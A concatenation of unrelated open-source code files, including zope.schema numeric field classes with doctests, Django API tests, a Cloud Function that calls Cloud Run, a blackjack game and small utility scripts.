>>> b.fromUnicode('True')
True
>>> b.fromUnicode('')
False
>>> b.fromUnicode('true')
True
>>> b.fromUnicode('false') or b.fromUnicode('False')
False
>>> b.fromUnicode(u'\u2603')
False
"""
# On Python 2, we're relying on the implicit decoding
# that happens during string comparisons of unicode to native
# (byte) strings; decoding errors are silently dropped
v = value == 'True' or value == 'true'
self.validate(v)
return v
def fromBytes(self, value):
"""
>>> from zope.schema._bootstrapfields import Bool
>>> from zope.schema.interfaces import IFromBytes
>>> b = Bool()
>>> IFromBytes.providedBy(b)
True
>>> b.fromBytes(b'True')
True
>>> b.fromBytes(b'')
False
>>> b.fromBytes(b'true')
True
>>> b.fromBytes(b'false') or b.fromBytes(b'False')
False
>>> b.fromBytes(u'\u2603'.encode('utf-8'))
False
"""
return self.fromUnicode(value.decode("utf-8"))
class InvalidNumberLiteral(ValueError, ValidationError):
"""Invalid number literal."""
@implementer(IFromUnicode, IFromBytes)
class Number(Orderable, Field):
"""
A field representing a :class:`numbers.Number` and implementing
:class:`zope.schema.interfaces.INumber`.
The :meth:`fromUnicode` method will attempt to use the smallest or
strictest possible type to represent incoming strings::
>>> from zope.schema._bootstrapfields import Number
>>> f = Number()
>>> f.fromUnicode(u"1")
1
>>> f.fromUnicode(u"125.6")
125.6
>>> f.fromUnicode(u"1+0j")
(1+0j)
>>> f.fromUnicode(u"1/2")
Fraction(1, 2)
>>> f.fromUnicode(str(2**31234) + '.' + str(2**256)) # doctest: +ELLIPSIS
Decimal('234...936')
>>> f.fromUnicode(u"not a number") # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
InvalidNumberLiteral: Invalid literal for Decimal: 'not a number'
Similarly, :meth:`fromBytes` will do the same for incoming byte strings::
>>> from zope.schema._bootstrapfields import Number
>>> f = Number()
>>> f.fromBytes(b"1")
1
>>> f.fromBytes(b"125.6")
125.6
>>> f.fromBytes(b"1+0j")
(1+0j)
>>> f.fromBytes(b"1/2")
Fraction(1, 2)
>>> f.fromBytes((str(2**31234) + '.' + str(2**256)).encode('ascii')) # doctest: +ELLIPSIS
Decimal('234...936')
>>> f.fromBytes(b"not a number") # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
InvalidNumberLiteral: Invalid literal for Decimal: 'not a number'
.. versionadded:: 4.6.0
.. versionchanged:: 4.8.0
Implement :class:`zope.schema.interfaces.IFromBytes`
"""
_type = numbers.Number
# An ordered sequence of conversion routines. These should accept
# a native string and produce an object that is an instance of `_type`, or raise
# a ValueError. The order should be most specific/strictest towards least
# restrictive (in other words, lowest in the numeric tower towards highest).
# We break this rule with fractions, though: a floating point number is
# more generally useful and expected than a fraction, so we attempt to parse
# as a float before a fraction.
_unicode_converters = (int, float, fractions.Fraction, complex, decimal.Decimal)
# The type of error we will raise if all conversions fail.
_validation_error = InvalidNumberLiteral
def fromUnicode(self, value):
last_exc = None
for converter in self._unicode_converters:
try:
val = converter(value)
if converter is float and isinf(val) and decimal.Decimal in self._unicode_converters:
# Pass this on to decimal, if we're allowed
val = decimal.Decimal(value)
except (ValueError, decimal.InvalidOperation) as e:
last_exc = e
else:
self.validate(val)
return val
try:
raise self._validation_error(*last_exc.args).with_field_and_value(self, value)
finally:
last_exc = None
# On Python 2, native strings are byte strings, which is
# what the converters expect, so we don't need to do any decoding.
if PY2: # pragma: no cover
fromBytes = fromUnicode
else:
def fromBytes(self, value):
return self.fromUnicode(value.decode('utf-8'))
class Complex(Number):
"""
A field representing a :class:`numbers.Complex` and implementing
:class:`zope.schema.interfaces.IComplex`.
The :meth:`fromUnicode` method is like that for :class:`Number`,
but doesn't allow Decimals::
>>> from zope.schema._bootstrapfields import Complex
>>> f = Complex()
>>> f.fromUnicode(u"1")
1
>>> f.fromUnicode(u"125.6")
125.6
>>> f.fromUnicode(u"1+0j")
(1+0j)
>>> f.fromUnicode(u"1/2")
Fraction(1, 2)
>>> f.fromUnicode(str(2**31234) + '.' + str(2**256)) # doctest: +ELLIPSIS
inf
>>> f.fromUnicode(u"not a number") # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
InvalidNumberLiteral: Invalid literal for Decimal: 'not a number'
Similarly for :meth:`fromBytes`:
>>> from zope.schema._bootstrapfields import Complex
>>> f = Complex()
>>> f.fromBytes(b"1")
1
>>> f.fromBytes(b"125.6")
125.6
>>> f.fromBytes(b"1+0j")
(1+0j)
>>> f.fromBytes(b"1/2")
Fraction(1, 2)
>>> f.fromBytes((str(2**31234) + '.' + str(2**256)).encode('ascii')) # doctest: +ELLIPSIS
inf
>>> f.fromBytes(b"not a number") # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
InvalidNumberLiteral: Invalid literal for Decimal: 'not a number'
.. versionadded:: 4.6.0
"""
_type = numbers.Complex
_unicode_converters = (int, float, complex, fractions.Fraction)
class Real(Complex):
"""
A field representing a :class:`numbers.Real` and implementing
:class:`zope.schema.interfaces.IReal`.
The :meth:`fromUnicode` method is like that for :class:`Complex`,
but doesn't allow Decimals or complex numbers::
>>> from zope.schema._bootstrapfields import Real
>>> f = Real()
>>> f.fromUnicode("1")
1
>>> f.fromUnicode("125.6")
125.6
>>> f.fromUnicode("1+0j") # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
InvalidNumberLiteral: Invalid literal for Fraction: '1+0j'
>>> f.fromUnicode("1/2")
Fraction(1, 2)
>>> f.fromUnicode(str(2**31234) + '.' + str(2**256)) # doctest: +ELLIPSIS
inf
>>> f.fromUnicode("not a number") # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
InvalidNumberLiteral: Invalid literal for Decimal: 'not a number'
.. versionadded:: 4.6.0
"""
_type = numbers.Real
_unicode_converters = (int, float, fractions.Fraction)
class Rational(Real):
"""
A field representing a :class:`numbers.Rational` and implementing
:class:`zope.schema.interfaces.IRational`.
The :meth:`fromUnicode` method is like that for :class:`Real`,
but does not allow arbitrary floating point numbers::
>>> from zope.schema._bootstrapfields import Rational
>>> f = Rational()
>>> f.fromUnicode("1")
1
>>> f.fromUnicode("1/2")
Fraction(1, 2)
>>> f.fromUnicode("125.6")
Fraction(628, 5)
>>> f.fromUnicode("1+0j") # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
InvalidNumberLiteral: Invalid literal for Fraction: '1+0j'
>>> f.fromUnicode(str(2**31234) + '.' + str(2**256)) # doctest: +ELLIPSIS
Fraction(777..., 330...)
>>> f.fromUnicode("not a number") # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
InvalidNumberLiteral: Invalid literal for Decimal: 'not a number'
.. versionadded:: 4.6.0
"""
_type = numbers.Rational
_unicode_converters = (int, fractions.Fraction)
class InvalidIntLiteral(ValueError, ValidationError):
"""Invalid int literal."""
class Integral(Rational):
"""
A field representing a :class:`numbers.Integral` and implementing
:class:`zope.schema.interfaces.IIntegral`.
The :meth:`fromUnicode` method only allows integral values::
>>> from zope.schema._bootstrapfields import Integral
>>> f = Integral()
>>> f.fromUnicode("125")
125
>>> f.fromUnicode("125.6") #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
InvalidIntLiteral: invalid literal for int(): 125.6
Similarly for :meth:`fromBytes`:
>>> from zope.schema._bootstrapfields import Integral
>>> f = Integral()
>>> f.fromBytes(b"125")
125
>>> f.fromBytes(b"125.6") #doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
InvalidIntLiteral: invalid literal for int(): 125.6
.. versionadded:: 4.6.0
"""
_type = numbers.Integral
_unicode_converters = (int,)
_validation_error = InvalidIntLiteral
class Int(Integral):
"""A field representing a native integer type. and implementing
:class:`zope.schema.interfaces.IInt`.
"""
_type = integer_types
_unicode_converters = (int,)
class _ObjectsBeingValidated(threading.local):
def __init__(self):
super(_ObjectsBeingValidated, self).__init__()
self.ids_being_validated = set()
def get_schema_validation_errors(schema, value,
_validating_objects=_ObjectsBeingValidated()):
"""
Validate that *value* conforms to the schema interface *schema*.
All :class:`zope.schema.interfaces.IField` members of the *schema*
are validated after being bound to *value*. (Note that we do not check for
arbitrary :class:`zope.interface.Attribute` members being present.)
:return: A `dict` mapping field names to `ValidationError` subclasses.
A non-empty return value means that validation failed.
"""
errors = {}
# Interface can be used as schema property for Object fields that plan to
# hold values of any type.
# Because Interface does not include any Attribute, it is obviously not
# worth looping on its methods and filter them all out.
if schema is Interface:
return errors
# if `value` is part of a cyclic graph, we need to break the cycle to avoid
# infinite recursion. Collect validated objects in a thread local dict by
# it's python represenation. A previous version was setting a volatile
# attribute which didn't work with security proxy
id_value = id(value)
ids_being_validated = _validating_objects.ids_being_validated
if id_value in ids_being_validated:
return errors
ids_being_validated.add(id_value)
# (If we have gotten here, we know that `value` provides an interface
# other than zope.interface.Interface;
# iow, we can rely on the fact that it is an instance
# that supports attribute assignment.)
try:
for name in schema.names(all=True):
attribute = schema[name]
if IMethod.providedBy(attribute):
continue # pragma: no cover
try:
if IValidatable.providedBy(attribute):
# validate attributes that are fields
field_value = getattr(value, name)
attribute = attribute.bind(value)
attribute.validate(field_value)
except ValidationError as error:
errors[name] = error
except AttributeError as error:
# property for the given name is not implemented
errors[name] = SchemaNotFullyImplemented(error).with_field_and_value(attribute, None)
finally:
ids_being_validated.remove(id_value)
return errors
def get_validation_errors(schema, value, validate_invariants=True):
"""
Validate that *value* conforms to the schema interface *schema*.
This includes checking for any schema validation errors (using
`get_schema_validation_errors`). If that succeeds, and
*validate_invariants* is true, then we proceed to check for any
declared invariants.
Note that this does not include a check to see if the *value*
actually provides the given *schema*.
:return: If there were any validation errors, either schema or
invariant, return a two tuple (schema_error_dict,
invariant_error_list). If there were no errors, returns a
two-tuple where both members are empty.
"""
schema_error_dict = get_schema_validation_errors(schema, value)
invariant_errors = []
# Only validate invariants if there were no previous errors. Previous
# errors could be missing attributes which would most likely make an
# invariant raise an AttributeError.
if validate_invariants and not schema_error_dict:
try:
schema.validateInvariants(value, invariant_errors)
except Invalid:
# validateInvariants raises a wrapper error around
# all the errors it got if it got errors, in addition
# to appending them to the errors list. We don't want
# that, we raise our own error.
pass
return (schema_error_dict, invariant_errors)
class Object(Field):
"""
Implementation of :class:`zope.schema.interfaces.IObject`.
"""
schema = None
def __init__(self, schema=_NotGiven, **kw):
"""
Object(schema=<Not Given>, *, validate_invariants=True, **kwargs)
Create an `~.IObject` field. The keyword arguments are as for `~.Field`.
.. versionchanged:: 4.6.0
Add the keyword argument *validate_invariants*. When true (the default),
the schema's ``validateInvariants`` method will be invoked to check
the ``@invariant`` properties of the schema.
.. versionchanged:: 4.6.0
The *schema* argument can be ommitted in a subclass
that specifies a ``schema`` attribute.
"""
if schema is _NotGiven:
schema = self.schema
if not IInterface.providedBy(schema):
# Note that we don't provide 'self' as the 'field'
# by calling with_field_and_value(): We're not fully constructed,
# we don't want this instance to escape.
raise NotAnInterface(schema, self.__name__)
self.schema = schema
self.validate_invariants = kw.pop('validate_invariants', True)
super(Object, self).__init__(**kw)
def getExtraDocLines(self):
lines = super(Object, self).getExtraDocLines()
lines.append(_DocStringHelpers.make_class_field("Must Provide", self.schema))
return lines
def _validate(self, value):
super(Object, self)._validate(value)
# schema has to be provided by value
if not self.schema.providedBy(value):
raise SchemaNotProvided(self.schema, value).with_field_and_value(self, value)
# check the value against schema
schema_error_dict, invariant_errors = get_validation_errors(
self.schema,
value,
self.validate_invariants
)
if schema_error_dict or invariant_errors:
errors = list(schema_error_dict.values()) + invariant_errors
exception = SchemaNotCorrectlyImplemented(
errors,
self.__name__,
schema_error_dict,
invariant_errors
).with_field_and_value(self, value)
try:
raise exception
finally:
# Break cycles
del exception
del invariant_errors
del schema_error_dict
del errors
def set(self, object, value):
# Announce that we're going to assign the value to the object.
# Motivation: Widgets typically like to take care of policy-specific
# actions, like establishing location.
event = BeforeObjectAssignedEvent(value, self.__name__, object)
notify(event)
# The event subscribers are allowed to replace the object, thus we need
# to replace our previous value.
value = event.object
super(Object, self).set(object, value)
@implementer(IBeforeObjectAssignedEvent)
class BeforeObjectAssignedEvent(object):
"""An object is going to be assigned to an attribute on another object."""
def __init__(self, object, name, context):
self.object = object
self.name = name
self.context = context
| StarcoderdataPython |
11394303 | import json
from django.contrib.auth import get_user_model
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from audit.models import AuditLog, RelatedObjectType
from environments.identities.models import Identity
from environments.identities.traits.models import Trait
from environments.models import STRING, Environment
from organisations.models import Organisation, OrganisationRole
from projects.models import Project
from segments.models import EQUAL, Condition, Segment, SegmentRule
User = get_user_model()
class SegmentViewSetTestCase(APITestCase):
def setUp(self) -> None:
self.user = User.objects.create(email="<EMAIL>")
self.organisation = Organisation.objects.create(name="Test Organisation")
self.user.add_organisation(self.organisation, OrganisationRole.ADMIN)
self.client.force_authenticate(self.user)
self.project = Project.objects.create(
name="Test project", organisation=self.organisation
)
def tearDown(self) -> None:
AuditLog.objects.all().delete()
def test_audit_log_created_when_segment_created(self):
# Given
url = reverse("api-v1:projects:project-segments-list", args=[self.project.id])
data = {
"name": "Test Segment",
"project": self.project.id,
"rules": [{"type": "ALL", "rules": [], "conditions": []}],
}
# When
res = self.client.post(
url, data=json.dumps(data), content_type="application/json"
)
# Then
assert res.status_code == status.HTTP_201_CREATED
assert (
AuditLog.objects.filter(
related_object_type=RelatedObjectType.SEGMENT.name
).count()
== 1
)
def test_audit_log_created_when_segment_updated(self):
# Given
segment = Segment.objects.create(name="Test segment", project=self.project)
url = reverse(
"api-v1:projects:project-segments-detail",
args=[self.project.id, segment.id],
)
data = {
"name": "New segment name",
"project": self.project.id,
"rules": [{"type": "ALL", "rules": [], "conditions": []}],
}
# When
res = self.client.put(
url, data=json.dumps(data), content_type="application/json"
)
# Then
assert res.status_code == status.HTTP_200_OK
assert (
AuditLog.objects.filter(
related_object_type=RelatedObjectType.SEGMENT.name
).count()
== 1
)
def test_can_filter_by_identity_to_get_only_matching_segments(self):
# Given
trait_key = "trait_key"
trait_value = "trait_value"
matching_segment = Segment.objects.create(
name="Matching segment", project=self.project
)
matching_rule = SegmentRule.objects.create(
segment=matching_segment, type=SegmentRule.ALL_RULE
)
Condition.objects.create(
rule=matching_rule, property=trait_key, operator=EQUAL, value=trait_value
)
Segment.objects.create(name="Non matching segment", project=self.project)
environment = Environment.objects.create(
name="Test environment", project=self.project
)
identity = Identity.objects.create(
identifier="test-user", environment=environment
)
Trait.objects.create(
identity=identity,
trait_key=trait_key,
value_type=STRING,
string_value=trait_value,
)
base_url = reverse(
"api-v1:projects:project-segments-list", args=[self.project.id]
)
url = base_url + "?identity=%d" % identity.id
# When
res = self.client.get(url)
# Then
assert res.json().get("count") == 1
def test_cannot_create_segments_without_rules(self):
# Given
url = reverse("api-v1:projects:project-segments-list", args=[self.project.id])
data = {"name": "New segment name", "project": self.project.id, "rules": []}
# When
res = self.client.post(
url, data=json.dumps(data), content_type="application/json"
)
# Then
assert res.status_code == status.HTTP_400_BAD_REQUEST
def test_can_create_segments_with_boolean_condition(self):
# Given
url = reverse("api-v1:projects:project-segments-list", args=[self.project.id])
data = {
"name": "New segment name",
"project": self.project.id,
"rules": [
{
"type": "ALL",
"rules": [],
"conditions": [
{"operator": EQUAL, "property": "test-property", "value": True}
],
}
],
}
# When
res = self.client.post(
url, data=json.dumps(data), content_type="application/json"
)
# Then
assert res.status_code == status.HTTP_201_CREATED
| StarcoderdataPython |
170329 | <filename>projeto_05.py
dic = {}
while True:
perg = str(input('Deseja fazer um comentário ? [S/N] ')).strip().upper()[0]
if perg == 'S':
dic['coment'] = str(input('Qual o seu comentário ? ')).strip().upper()
print('Obrigado pelo seu comentário')
elif perg == 'N':
print('Até mais !')
break
else:
print('Resposta incorreta')
while True:
try:
perg_1 = str(input('Deseja avaliar em estrelas ? [S/N]')).upper().strip()[0]
while True:
if perg_1 == 'S':
try:
dic['estrelas'] = int(input('Quantas estrelas você avalia para o nosso serviço ? [0 - 5]'))
if dic['estrelas'] <= 5:
print('Muito obrigado pela sua resposta !')
break
else:
print('Resposta Incorreta')
except (ValueError, IndexError):
print('Resposta Incorreta')
elif perg_1 == 'N':
print('Até mais !')
break
else:
print('Resposta Incorreta')
break
except (ValueError, IndexError):
print('Resposta Incorreta')
| StarcoderdataPython |
1970822 | """Converts .md files to Unix man files using pandoc and Seamless
TODO: Store as a single Seamless graph, as soon as Seamless has map-reduce
"""
docdir = ".."
buffer_cache = "seamless-buffer-cache.zip"
result_cache = "seamless-result-cache.dat"
import glob, os
from seamless.highlevel import Context, Transformer, Cell
import seamless
docfiles0 = glob.glob("{}/*.md".format(docdir))
docfiles = [os.path.splitext(
os.path.split(f)[1]
)[0] for f in docfiles0]
# TODO: make a real API for this
from seamless.core.cache.transformation_cache import transformation_cache
if os.path.exists(result_cache):
with open(result_cache) as f:
for line in f:
tf_checksum, result_checksum = line.split()
tf_checksum = bytes.fromhex(tf_checksum)
result_checksum = bytes.fromhex(result_checksum)
transformation_cache.transformation_results[tf_checksum] = \
result_checksum, False
# /TODO
ctx = Context()
if os.path.exists(buffer_cache):
ctx.add_zip(buffer_cache)
ctx.pandoc = """
ln -s inputfile input.md
pandoc --standalone --to man input.md -o /dev/stdout
"""
for f in docfiles:
setattr(ctx, f, Context())
sctx = getattr(ctx, f)
md = "{}/{}.md".format(docdir, f)
sctx.md = Cell("text").set(open(md).read())
tf = sctx.tf = Transformer()
tf.language = "bash"
tf.scriptname = f
tf.inputfile = sctx.md
tf.code = ctx.pandoc
sctx.result = tf
sctx.result.celltype = "text"
sctx.result.mount("build/{}.1".format(f), "w")
ctx.compute()
ctx.save_zip(buffer_cache)
# TODO: make a real API for this
from seamless.core.cache.transformation_cache import transformation_cache
with open(result_cache, "w") as result_cache:
for tf_checksum, (result_checksum, prelim) in sorted(
transformation_cache.transformation_results.items()
):
if not prelim:
print(
tf_checksum.hex(),
result_checksum.hex(),
file=result_cache
)
# / TODO | StarcoderdataPython |
8171366 | # Copyright 2020 Google, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import requests
import json
import os
def handle_newfile(data, context):
"""Background Cloud Function to be triggered by Cloud Storage.
This generic function calls the Cloud Run URL endpoint.
Args:
data (dict): The Cloud Functions event payload.
context (google.cloud.functions.Context): Metadata of triggering event.
Returns:
None; the output is written to Stackdriver Logging
"""
payload = {
'bucket' : data['bucket'],
'filename': data['name']
}
# Notes:
# (1) Ideally, we can simply invoke mlp_babyweight.finetune from here
# However, kfp.Client() has dependencies on binaries that are not available in Cloud Functions
# Hence, this workaround of putting mlp_babyweight.py in a Docker container and invoking it
# via Cloud Run
# (2) We could reduce the traffic to Cloud Run by checking filename pattern here
# but for reusability and maintainability reasons, I'm keeping this
# Cloud Function as a simple pass-through
# receiving service url
url = os.environ.get('DESTINATION_URL', "No DESTINATION_URL")
print("Invoking Cloud Run at {} with {}".format(url, payload))
# See https://cloud.google.com/run/docs/authenticating/service-to-service
metadata_server_token_url = 'http://metadata/computeMetadata/v1/instance/service-accounts/default/identity?audience='
token_request_url = metadata_server_token_url + url
token_request_headers = {'Metadata-Flavor': 'Google'}
token_response = requests.get(token_request_url, headers=token_request_headers)
jwt = token_response.content.decode("utf-8")
# Provide the token in the request to the receiving service
headers = {
'Authorization': f'bearer {jwt}',
'Content-Type':'application/json'
}
print("Headers = {}".format(headers))
resp = requests.post(url, data=json.dumps(payload), headers=headers)
return (resp.status_code == requests.codes.ok)
| StarcoderdataPython |
1989227 | <gh_stars>0
# -*- coding:utf-8 -*-
def hex_value(hex_byte: int) -> int:
if type(hex_byte) is not int:
# print("hex_byte must be in")
raise TypeError("hex_byte must be in")
else:
if hex_byte in range(0x30, 0x3a):
return hex_byte - 0x30
elif hex_byte in range(0x41, 0x5b):
return hex_byte - 0x41
elif hex_byte in range(0x61, 0x7b):
return hex_byte - 0x61
else:
raise ValueError(("hex byte must be in"
" range(0x30, 0x3a)" # 0-9
" or range(0x41, 0x5b)" # A-Z
" or range(0x61, 0x7b)" # a-z
))
if __name__ == '__main__':
try:
flag = hex_value(0x29)
print(flag)
except Exception as ex:
print(ex)
finally:
print("---")
| StarcoderdataPython |
3250290 | """Add 'wiki' field to Person table
Revision ID: 3aecd12384ee
Revises: <PASSWORD>
Create Date: 2013-08-19 16:33:39.723178
"""
# revision identifiers, used by Alembic.
revision = '3aecd12384ee'
down_revision = '<PASSWORD>'
from alembic import op
import sqlalchemy as sa
def upgrade():
op.add_column('person', sa.Column('wiki', sa.Text(), nullable=True))
def downgrade():
op.drop_column('person', 'wiki')
| StarcoderdataPython |
3523999 | # CLASSES
#from random import*
import random
class deck:
def __init__(self):
self.deck=[[1,2,3,4,5,6,7,8,9,10,11,12,13],['Spades','Clubs','Hearts','Diamonds']]
self.names={1:'Ace', 2:'Two', 3:'Three', 4:'Four', 5:'Five', 6:'Six', 7:'Seven', 8:'Eight', 9:'Nine', 10:'Ten', 11:'Jack', 12:'Queen', 13:'King'}
def randomgroup(self):
return self.deck[1][random.randint(0,3)]
def randomface(self):
return self.deck[0][random.randint(0,12)]
# Inheritance to be used //////////////////////////////////////
class player:
def __init__(self,funds=100):
self.myfunds = funds
self.cards=[]
self.bet=0
self.val=0
self.busts=False
self.aces=0
def __str__(self):
return 'Player'
def blackjack(self):
print('Fantastic! You won through BlackJack! :-)')
self.bet=self.bet+self.bet*1.5
self.myfunds+=self.bet
self.bet=0
self.val=0
self.aces=0
self.cards.clear()
def win(self):
print('You won the game.Cool!')
self.bet*=2
self.myfunds+=self.bet
self.bet=0
self.val=0
self.aces=0
self.cards.clear()
def bust(self):
print('You are busted.')
self.bet=0
self.val=0
self.aces=0
self.cards.clear()
self.busts=True
def lose(self):
self.bet=0
self.val=0
self.aces=0
self.cards.clear()
self.busts=False
class dealer:
def __init__(self):
self.cards=[]
self.val=0
self.hiddencard=''
self.busts=False
self.aces=0
def hidecard(self):
if len(self.cards)!=0:
self.hiddencard=self.cards[1]
self.cards[1]='Card Faced down'
else:
print('No card to hide')
def revealcard(self):
if len(self.cards)!=0:
self.cards[1]=self.hiddencard
self.hiddencard=''
else:
print('No card to reveal')
def __str__(self):
return 'Dealer'
def win(self):
print('Dealer won the game.Better luck next time!:-(')
self.val=0
self.aces=0
self.cards.clear()
def bust(self):
print('Dealer is busted.')
self.val=0
self.aces=0
self.busts=True
self.cards.clear()
def lose(self):
self.val=0
self.aces=0
self.cards.clear()
self.busts=False
# GAMEPLAY
#Variables
deck1=deck()
player1=player()
dealer1=dealer()
gc=False
#Definitions
def new_card(group,face,pcards,p): # debugged(1found)
pcards.append(f"{deck1.names[face]} of {group}")
if face==1:
p.aces+=1
p.val+=val_count(face)
while p.val>21 and p.aces:
p.val-=10
p.aces-=1
def val_count(f_card): # debugged(ace left)
if f_card== 1:#--- ------------>ACE
return 11
if f_card in range(2,11) :
return f_card
if f_card in range(11,14):
return 10
def printcards(a): # debugged
if len(a.cards)!=0:
print(f"{str(a)} has following cards:")
for _ in a.cards:
print(_)
print(a.val)
else:
print(f"{str(a)} has no cards.")
def askforbet(b): # debugged
a=input('Enter your bet amount:')
try:
a=int(a)
except:
print('Invalid Input')
askforbet(b)
else:
if a>b.myfunds:
print(f'Insufficient funds. Your chips:{b.myfunds}')
askforbet(b)
else:
b.myfunds-=a
b.bet=a
def askforhit(): # debugged(multiple bugs found , gameplay adjusted)
global gc
while True:
print("=======================================")
a=input('Choose HIT or STAY: ').lower()
print("=======================================")
if a=='stay':
print('PLayer stays!')
break
elif a=='hit':
hit(player1)
if player1.val>21:
player1.bust()
gc=True
break
if player1.val==21:
player1.win()
gc=True
break
else:
print('Not a valid input.')
askforhit()
def hit(x): # created for gameplay adjustment
print(f"{str(x)} hits!")
new_card(deck1.randomgroup(),deck1.randomface(),x.cards,x)
print("=======================================")
printcards(x)
def tie(): # debugged
print('\n')
print("=======================================")
print('The Game is Tied :-|')
print("=======================================")
player1.myfunds+=player1.bet
player1.bet=0
player1.val=0
player1.cards.clear()
dealer1.val=0
dealer1.cards.clear()
def playagain(): # debugged
a=input('Play Again?(Yes/No):').lower()
if a=='yes':
play()
elif a=='no':
print('OK then. GoodBye')
print('\n')
print("=======================================")
else:
print('Not a valid input.')
playagain()
def gameover(): # debugged
global gc
if dealer1.busts:
player1.win()
elif player1.busts:
dealer1.win()
else:
print('Good Game!')
gc=False
def play():
global gc
print('\n')
print("=======================================")
print('Welcome to BlackJack')
print("=======================================")
print('\n')
print("=======================================")
askforbet(player1)
print('Your bet has been placed.')
print("=======================================")
print('\n')
new_card(deck1.randomgroup(),deck1.randomface(),player1.cards,player1)
new_card(deck1.randomgroup(),deck1.randomface(),player1.cards,player1)
new_card(deck1.randomgroup(),deck1.randomface(),dealer1.cards,dealer1)
new_card(deck1.randomgroup(),deck1.randomface(),dealer1.cards,dealer1)
dealer1.hidecard()
print('\n')
print("=======================================")
printcards(dealer1)
printcards(player1)
print("=======================================")
print('\n')
if player1.val == 21:
player1.blackjack()
gc=True
askforhit()
if not gc:
print('\n')
print("=======================================")
dealer1.revealcard()
print('Dealer\'s card is revealed')
printcards(dealer1)
print("=======================================")
print('\n')
while dealer1.val<17 :
y=input('Press ENTER to continue.')
print('\n')
print("=======================================")
hit(dealer1)
if dealer1.val>21:
dealer1.bust()
gc=True
break
if dealer1.val==21:
dealer1.win()
gc=True
break
if not gc:
y=input('Press ENTER to continue.')
if dealer1.val==player1.val:
tie()
elif dealer1.val>player1.val:
print("=======================================")
print('Dealer has a higher hand.')
print("=======================================")
dealer1.win()
player1.lose()
print("=======================================")
else:
print("=======================================")
print('You have a higher hand.')
print("=======================================")
player1.win()
dealer1.lose()
print("=======================================")
play()
gameover()
playagain()
| StarcoderdataPython |
1630208 | import numpy as np
def DeterPoint(map, row, column):
for i in [row - 1, row, row + 1]:
for j in [column - 1, column, column + 1]:
if map[i][j] == -1:
return True
return False
def FBE(map, row, column, mark):
for i in [row - 1, row, row + 1]:
for j in [column - 1, column, column + 1]:
if map[i][j] == 0 and DeterPoint(map, i, j):
map[i][j] = mark
map = FBE(map, i, j, mark)
return map
mark = -2
frontier_localmap = np.random.randint(0, 3, (800, 800)) - 1
frontier_localmap[0:10, :] = 1
frontier_localmap[-11:-1, :] = 1
frontier_localmap[:, 0:10] = 1
frontier_localmap[:, -11:-1] = 1
for row in range(len(frontier_localmap)-1):
for column in range(len(frontier_localmap[0])-1):
if frontier_localmap[row][column] == 0 and DeterPoint(frontier_localmap, row, column):
frontier_localmap[row][column] = mark
frontier_localmap = FBE(frontier_localmap, row, column, mark)
mark -= 1
print(frontier_localmap) | StarcoderdataPython |
11296477 | <reponame>EngineeringSoftware/hdlp
# This script copies assignment prediction model test results into
# _results/test-results/{model_name}.json.
from typing import *
import argparse
import os
import glob
TESTDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), "tests")
RESULT_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), "../slpproject/_results")
DST_DIR = os.path.join(RESULT_DIR, "test-results")
parser = argparse.ArgumentParser()
parser.add_argument('-which', '--which', required=True,
default=[],
type=str, nargs='+', help='model list used for copying result files.')
parser.add_argument('-suffix', '--suffix', required=True,
default='',
type=str, help='suffix for the results to be used in files/macros')
def check_models(args):
for m in args.which:
result_files = glob.glob(os.path.join(TESTDIR, m, "testlog.*.log"))
assert len(result_files)>=1, f"Can't find result files for model {m}"
return
def copy_results(args, model, mode):
from shutil import copyfile
if not os.path.exists(DST_DIR):
os.mkdir(DST_DIR)
src = glob.glob(os.path.join(TESTDIR, model, "testlog.assignments.*.log"))
if mode == "val":
src = glob.glob(os.path.join(TESTDIR, model, "testlog.val.assignments.*.log"))
assert len(src) == 1
suffix = args.suffix
dst = os.path.join(DST_DIR, f"{model}{suffix}.json")
copyfile(src[0], dst)
return
def copy_model_results(args):
for m in args.which:
copy_results(args, m, "test")
return
def main():
args = parser.parse_args()
check_models(args)
copy_model_results(args)
return
if __name__=="__main__":
main()
| StarcoderdataPython |
11279185 | <reponame>MilesCranmer/bifrost<filename>python/bifrost/guppi_raw.py
# Copyright (c) 2016, The Bifrost Authors. All rights reserved.
# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Bifrost Authors nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
